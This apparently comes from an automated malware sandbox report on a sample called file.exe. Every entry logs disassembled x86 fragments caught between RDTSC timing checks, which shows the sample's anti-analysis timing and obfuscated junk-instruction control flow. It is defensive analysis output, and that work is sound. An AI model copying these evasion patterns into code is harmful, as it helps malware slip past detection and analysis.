                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D824A second address: 13D824E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D84D4 second address: 13D84E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC0EE second address: 13DC0F8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC0F8 second address: 13DC13F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jng 00007F9844BC1D72h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F9844BC1D68h 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 push ecx 0x00000021 pushad 0x00000022 popad 0x00000023 pop ecx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC13F second address: 13DC16E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 jmp 00007F98450EE8CAh 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC1C6 second address: 13DC1EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9844BC1D67h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC2DB second address: 13DC2E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC2E0 second address: 13DC2E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC2E6 second address: 13DC2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC344 second address: 13DC348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC348 second address: 13DC404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a nop 0x0000000b movzx edx, cx 0x0000000e push 00000000h 0x00000010 mov si, bx 0x00000013 push F9C9FBC5h 0x00000018 push eax 0x00000019 pushad 0x0000001a push edi 0x0000001b pop edi 0x0000001c jno 00007F98450EE8C6h 0x00000022 popad 0x00000023 pop eax 0x00000024 add dword ptr [esp], 063604BBh 0x0000002b jmp 00007F98450EE8D5h 0x00000030 add edx, 59DEBF5Eh 0x00000036 push 00000003h 0x00000038 jmp 00007F98450EE8D1h 0x0000003d push 00000000h 0x0000003f push 00000003h 0x00000041 call 00007F98450EE8CEh 0x00000046 cld 0x00000047 pop esi 0x00000048 push C9F19B0Ch 0x0000004d jmp 00007F98450EE8CAh 0x00000052 xor dword ptr [esp], 09F19B0Ch 0x00000059 push edi 0x0000005a mov dword ptr [ebp+122D39B3h], eax 0x00000060 pop edi 0x00000061 mov dl, 7Dh 0x00000063 lea ebx, dword ptr [ebp+1244E018h] 0x00000069 sub dword ptr [ebp+122D1D7Bh], ecx 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jnp 00007F98450EE8D7h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC450 second address: 13DC457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDD0F second address: 13EDD15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC6BA second address: 13FC6C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D210C second address: 13D2124 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F98450EE8D2h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FA76F second address: 13FA78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 jne 00007F9844BC1D56h 0x0000000c jnp 00007F9844BC1D56h 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F9844BC1D56h 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAC17 second address: 13FAC1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF20 second address: 13FAF44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9844BC1D56h 0x0000000a jmp 00007F9844BC1D5Fh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007F9844BC1D56h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF44 second address: 13FAF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF48 second address: 13FAF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF4E second address: 13FAF5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 ja 00007F98450EE8C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FAF5E second address: 13FAF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9844BC1D60h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB508 second address: 13FB50C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB50C second address: 13FB512 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB512 second address: 13FB51A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB51A second address: 13FB51E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB51E second address: 13FB538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FB691 second address: 13FB6A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Bh 0x00000007 jo 00007F9844BC1D5Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0D94 second address: 13F0D9E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0D9E second address: 13F0DD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F9844BC1D66h 0x00000013 ja 00007F9844BC1D56h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D068F second address: 13D0695 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D0695 second address: 13D069B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D069B second address: 13D06A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBDBB second address: 13FBDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9844BC1D67h 0x0000000c jg 00007F9844BC1D56h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBDDF second address: 13FBE07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F98450EE8CAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBF40 second address: 13FBF48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBF48 second address: 13FBF5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F98450EE8CCh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FBF5C second address: 13FBF76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F9844BC1D5Eh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC0E6 second address: 13FC0F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F98450EE8C6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC0F2 second address: 13FC0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC536 second address: 13FC53A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC53A second address: 13FC555 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9844BC1D5Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC555 second address: 13FC569 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC569 second address: 13FC56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC56F second address: 13FC575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC575 second address: 13FC57B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC57B second address: 13FC57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDC91 second address: 13FDCCA instructions: 0x00000000 rdtsc 0x00000002 js 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F9844BC1D63h 0x0000000f jmp 00007F9844BC1D64h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDCCA second address: 13FDCE1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F98450EE8CAh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDCE1 second address: 13FDCF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007F9844BC1D56h 0x0000000d jl 00007F9844BC1D56h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FDCF4 second address: 13FDCFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14001C2 second address: 14001D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F9844BC1D5Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14001D5 second address: 14001D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14001D9 second address: 1400206 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F9844BC1D5Fh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400206 second address: 140020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140020A second address: 140020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140020E second address: 1400214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FEAA8 second address: 13FEAAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FF1D2 second address: 13FF1D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002B3 second address: 14002B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002B9 second address: 14002BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002BF second address: 14002C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002C3 second address: 14002DF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F98450EE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F98450EE8CDh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14002DF second address: 1400307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9844BC1D63h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400307 second address: 140032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F98450EE8CCh 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14097E2 second address: 14097E7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1409AE9 second address: 1409AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0A5 second address: 140B0AF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0AF second address: 140B0B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0B5 second address: 140B0CF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9844BC1D56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jbe 00007F9844BC1D64h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0CF second address: 140B0D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B0D3 second address: 140B139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F9844BC1D68h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F9844BC1D5Bh 0x00000016 pop eax 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F9844BC1D58h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 call 00007F9844BC1D59h 0x00000036 jc 00007F9844BC1D64h 0x0000003c pushad 0x0000003d jbe 00007F9844BC1D56h 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B139 second address: 140B145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B145 second address: 140B184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F9844BC1D63h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F9844BC1D68h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B47D second address: 140B481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B481 second address: 140B485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B836 second address: 140B83A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140B83A second address: 140B843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140BEFD second address: 140BF16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F98450EE8D4h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0F5 second address: 140C0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0FB second address: 140C0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C0FF second address: 140C126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d js 00007F9844BC1D5Ch 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140C185 second address: 140C18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140DD39 second address: 140DDC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9844BC1D5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov di, cx 0x00000010 push 00000000h 0x00000012 add dword ptr [ebp+122D2A02h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F9844BC1D58h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 call 00007F9844BC1D5Eh 0x00000039 jmp 00007F9844BC1D68h 0x0000003e pop edi 0x0000003f xchg eax, ebx 0x00000040 jmp 00007F9844BC1D67h 0x00000045 push eax 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6C4 second address: 140E6DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F98450EE8D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6DF second address: 140E6E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6E3 second address: 140E6E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140E6E9 second address: 140E75B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9844BC1D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F9844BC1D58h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007F9844BC1D62h 0x00000029 push 00000000h 0x0000002b mov dword ptr [ebp+122D2251h], esi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F9844BC1D58h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pop esi 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14103B3 second address: 14103B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14103B7 second address: 14103BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
